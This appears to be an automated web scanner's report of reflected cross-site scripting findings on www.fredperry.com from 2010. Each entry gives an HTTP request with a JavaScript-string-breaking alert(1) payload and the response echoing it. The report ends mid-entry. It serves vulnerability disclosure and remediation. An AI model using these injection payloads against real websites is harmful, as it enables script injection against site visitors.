The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec008"-alert(1)-"80aa6a98e3c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/womenec008"-alert(1)-"80aa6a98e3c/skirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:15:29 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=go8661utj997ijktrdilvrbo94; expires=Tue, 09-Nov-2010 17:15:29 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29364
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/womenec008"-alert(1)-"80aa6a98e3c/skirts/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 361b2"-alert(1)-"f83ab23d34f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/skirts361b2"-alert(1)-"f83ab23d34f/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:15:55 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=oei1spgobhg9om8dfjglfbemp2; expires=Tue, 09-Nov-2010 17:15:55 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29364
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/skirts361b2"-alert(1)-"f83ab23d34f/"); //]]> ...[SNIP]...
1.197. http://www.fredperry.com/limited-edition/women/skirts/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/women/skirts/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af0b4"-alert(1)-"a8e2f292ac9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/skirts/?af0b4"-alert(1)-"a8e2f292ac9=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/skirts/?af0b4"-alert(1)-"a8e2f292ac9=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b9eb"-alert(1)-"50f709e851f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition1b9eb"-alert(1)-"50f709e851f/women/trousers/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:15:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=u06s68bsfnbfrbev1v8hrviv00; expires=Tue, 09-Nov-2010 17:15:06 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29366
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition1b9eb"-alert(1)-"50f709e851f/women/trousers/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b902"-alert(1)-"e78c997e91a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women1b902"-alert(1)-"e78c997e91a/trousers/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:15:34 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=1u5sk21vdignd9qge2jro4ab25; expires=Tue, 09-Nov-2010 17:15:34 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29366
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women1b902"-alert(1)-"e78c997e91a/trousers/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3aa1"-alert(1)-"c696673324a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/trouserse3aa1"-alert(1)-"c696673324a/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:15:49 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=v2n0dgimikcflarir6k9fetlc1; expires=Tue, 09-Nov-2010 17:15:50 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29366
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/trouserse3aa1"-alert(1)-"c696673324a/"); //]]> ...[SNIP]...
1.201. http://www.fredperry.com/limited-edition/women/trousers/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/women/trousers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 538dd"-alert(1)-"efb610e9ca5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/trousers/?538dd"-alert(1)-"efb610e9ca5=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/trousers/?538dd"-alert(1)-"efb610e9ca5=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 319c8"-alert(1)-"f02ad1cb55f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition319c8"-alert(1)-"f02ad1cb55f/women/woven-shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:19:43 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=rigtgilqb83fphgid5aqj3mvp0; expires=Tue, 09-Nov-2010 17:19:43 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition319c8"-alert(1)-"f02ad1cb55f/women/woven-shirts/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3421"-alert(1)-"f894b1a62ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/womenc3421"-alert(1)-"f894b1a62ca/woven-shirts/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:20:07 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=j9893l7sb023k0sn5sgpfqtaf3; expires=Tue, 09-Nov-2010 17:20:07 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/womenc3421"-alert(1)-"f894b1a62ca/woven-shirts/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48e5d"-alert(1)-"0ff88538cd5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/woven-shirts48e5d"-alert(1)-"0ff88538cd5/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:20:37 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=ci5qr6rsv2m15begkqb1alv0a0; expires=Tue, 09-Nov-2010 17:20:37 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/woven-shirts48e5d"-alert(1)-"0ff88538cd5/"); //]]> ...[SNIP]...
1.205. http://www.fredperry.com/limited-edition/women/woven-shirts/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/women/woven-shirts/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2c6f"-alert(1)-"871cf1c9b96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/woven-shirts/?d2c6f"-alert(1)-"871cf1c9b96=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/woven-shirts/?d2c6f"-alert(1)-"871cf1c9b96=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19550"-alert(1)-"81e975f5d42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /men19550"-alert(1)-"81e975f5d42/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 15:59:03 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=u66nlujlscjb3s1meug2h090a1; expires=Tue, 09-Nov-2010 16:59:03 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29339
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/men19550"-alert(1)-"81e975f5d42/"); //]]> ...[SNIP]...
1.207. http://www.fredperry.com/men/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/men/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15acc"-alert(1)-"28a03843a58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /men/?15acc"-alert(1)-"28a03843a58=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 610d1"-alert(1)-"57514bf41f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /men610d1"-alert(1)-"57514bf41f7/jackets/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:02:02 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=4920voebp25nvsp534rnbf95g2; expires=Tue, 09-Nov-2010 17:02:02 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29347
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/men610d1"-alert(1)-"57514bf41f7/jackets/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53f66"-alert(1)-"a580dc5b08a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /men/jackets53f66"-alert(1)-"a580dc5b08a/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:02:17 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=s18c05vpirje707vgd46ji7t64; expires=Tue, 09-Nov-2010 17:02:18 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29347
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/men/jackets53f66"-alert(1)-"a580dc5b08a/"); //]]> ...[SNIP]...
1.210. http://www.fredperry.com/men/jackets/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/men/jackets/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dba1b"-alert(1)-"17a5fe70f88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /men/jackets/?dba1b"-alert(1)-"17a5fe70f88=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a64af"-alert(1)-"3a1a3b3a61c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
